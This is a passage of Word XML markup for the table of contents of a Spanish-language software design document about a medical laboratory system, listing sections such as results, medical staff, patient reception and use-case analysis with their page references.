              </w:rPr>
              <w:t>Gestionar resultados</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371310 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</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11" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.5.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar plantel médico</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371311 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</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12" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.6.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar análisis</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371312 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</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13" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:t>3.3.7.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar parametrización de análisis</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371313 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</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14" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.8.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Generar reporte</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371314 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</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15" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.9.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Personalizar interfaz</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371315 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</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16" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.10.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recepción paciente</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371316 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371317" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 4.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Análisis</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371317 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371318" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Análisis de arquitectura</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371318 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</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19" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identificar paquetes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371319 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</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20" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Encapsulamiento de casos de usos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371320 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371321" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Análisis Casos de Uso y Clases</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371321 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</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22" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar usuario</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371322 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</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23" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Gestionar privilegio</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371323 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</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24" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Gestionar Paciente</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371324 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</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25" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.4.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Gestionar resultados</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371325 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</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26" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.5.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Gestionar Plantel Medico</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371326 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
